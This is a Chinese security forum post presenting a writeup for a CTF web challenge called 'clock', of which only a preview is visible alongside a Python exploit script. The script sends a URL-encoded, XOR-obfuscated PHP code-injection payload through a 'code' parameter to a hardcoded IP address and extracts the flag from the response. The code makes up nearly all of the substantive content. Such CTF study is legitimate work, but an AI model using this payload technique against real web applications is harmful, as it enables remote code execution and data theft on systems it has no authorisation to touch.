roger

2万积分	41 好友	1168 主题

发消息

[Web] web_clock_writeup

发表于 2021-4-6 22:56:35 | 查看: 4655| 回复: 0

相关题目：

♦ clock

<>

预览已结束，请登录阅读全文。

本文共1页,您只能预览前1页,下载后可全文阅读

点击登录

下载全文

版权说明：本文档由用户提供并上传，收益归属内容提供方，若内容存在侵权，请进行举报或认领

exp：

import re
import requests


def exp(ip,port):
    poc = '/index.php?code=${%22!%22^%22~%22}=%22[][][@%22^%22($()%3E-%22;${%22(%22^%22)%22}=%22]]]]%22^%22%3E%3C)}%22;${%22{%22^%22}%22}=%22]@:]%22^%22;,[:%22;${%22!%22^%22~%22}(${%22(%22^%22)%22}.%22/%22.${%22{%22^%22}%22});'
    url = r'http://'+str(ip)+':'+str(port)+str(poc)
    headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0'}
    try:
        response = requests.get(url=url,headers=headers,timeout=2)
        if (re.search('flag(.*)', response.text) != None):
            pattern = re.compile('flag(.*)')
            flag_result = re.search(pattern, response.text)
            return("获取flag为："+ str(flag_result.group(1)))
        else:
            return("未能读取到flag")
    except Exception as ex:
        return(ex)


if __name__ == "__main__":
    ip = '123.57.255.244'
    port = 80
    print(exp(ip,port))

温馨提示：

1.如果您喜欢这篇帖子，请给作者点赞评分，点赞会增加帖子的热度，评分会给作者加学币。(评分不会扣掉您的积分，系统每天都会重置您的评分额度)。
2.回复帖子不仅是对作者的认可，还可以获得学币奖励，请尊重他人的劳动成果，拒绝做伸手党！
3.发广告、灌水回复等违规行为一经发现直接禁言，如果本帖内容涉嫌违规，请点击论坛底部的举报反馈按钮，也可以在【投诉建议】板块发帖举报。

论坛交流群：672619046

收藏0 回复显示全部楼层道具举报打印

返回列表

		自动登录	找回密码
密码			立即注册

[Web] web_clock_writeup

教程达人

鬼斧神工